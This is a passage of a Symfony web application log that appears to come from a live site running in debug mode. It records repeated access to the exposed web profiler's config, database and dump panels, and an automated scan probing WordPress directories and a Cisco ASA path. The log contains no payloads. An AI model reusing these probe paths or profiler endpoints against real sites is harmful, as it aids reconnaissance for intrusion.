  5929. [2025-12-19 23:58:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
  5930. [2025-12-19 23:58:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5931. [2025-12-19 23:58:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=validator","method":"GET"} []
  5932. [2025-12-19 23:58:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  5933. [2025-12-20 00:00:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8d946f","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/8d946f?panel=time","method":"GET"} []
  5934. [2025-12-20 00:00:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5935. [2025-12-20 00:01:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/uploads"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/uploads\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5936. [2025-12-20 00:07:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5937. [2025-12-20 00:07:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5938. [2025-12-20 00:07:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5939. [2025-12-20 00:07:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5940. [2025-12-20 00:08:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5941. [2025-12-20 00:08:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5942. [2025-12-20 00:08:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5943. [2025-12-20 00:08:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5944. [2025-12-20 00:08:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5945. [2025-12-20 00:08:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5946. [2025-12-20 00:08:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5947. [2025-12-20 00:08:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5948. [2025-12-20 00:08:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5949. [2025-12-20 00:08:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5950. [2025-12-20 00:08:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5951. [2025-12-20 00:08:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5952. [2025-12-20 00:08:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5953. [2025-12-20 00:08:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5954. [2025-12-20 00:08:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5955. [2025-12-20 00:08:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5956. [2025-12-20 00:08:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5957. [2025-12-20 00:23:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=time","method":"GET"} []
  5958. [2025-12-20 00:23:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5959. [2025-12-20 00:25:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5960. [2025-12-20 00:26:36] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1877a1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/1877a1/search/results?ip=189.172.122.247&limit=10&method=GET","method":"GET"} []
  5961. [2025-12-20 00:26:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.122.247&limit=10&method=GET","method":"GET"} []
  5962. [2025-12-20 00:26:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"384a6d","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/384a6d/search/results?limit=10&method=GET","method":"GET"} []
  5963. [2025-12-20 00:26:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  5964. [2025-12-20 00:27:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f66ec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f66ec6?panel=db","method":"GET"} []
  5965. [2025-12-20 00:27:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5966. [2025-12-20 00:30:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"956458","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/956458?panel=router","method":"GET"} []
  5967. [2025-12-20 00:30:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  5968. [2025-12-20 00:33:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5969. [2025-12-20 00:34:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5970. [2025-12-20 00:39:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5971. [2025-12-20 00:41:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?group=1&panel=db","method":"GET"} []
  5972. [2025-12-20 00:41:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  5973. [2025-12-20 00:46:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=config","method":"GET"} []
  5974. [2025-12-20 00:46:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5975. [2025-12-20 00:46:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"770c18","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/770c18","method":"GET"} []
  5976. [2025-12-20 00:46:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5977. [2025-12-20 00:48:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bc8fa7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/bc8fa7","method":"GET"} []
  5978. [2025-12-20 00:48:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5979. [2025-12-20 00:52:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a276d6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a276d6?panel=dump","method":"GET"} []
  5980. [2025-12-20 00:52:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5981. [2025-12-20 00:55:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e4df","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e4df?panel=form","method":"GET"} []
  5982. [2025-12-20 00:55:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  5983. [2025-12-20 00:57:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=db","method":"GET"} []
  5984. [2025-12-20 00:57:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5985. [2025-12-20 00:57:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1bacb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a1bacb?panel=time","method":"GET"} []
  5986. [2025-12-20 00:57:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5987. [2025-12-20 01:00:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7478c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7478c3?panel=cache","method":"GET"} []
  5988. [2025-12-20 01:00:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5989. [2025-12-20 01:02:07] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"7735a8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/7735a8/search/results?limit=10&method=GET","method":"GET"} []
  5990. [2025-12-20 01:02:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  5991. [2025-12-20 01:02:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"497d02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/497d02?panel=config","method":"GET"} []
  5992. [2025-12-20 01:02:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5993. [2025-12-20 01:11:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
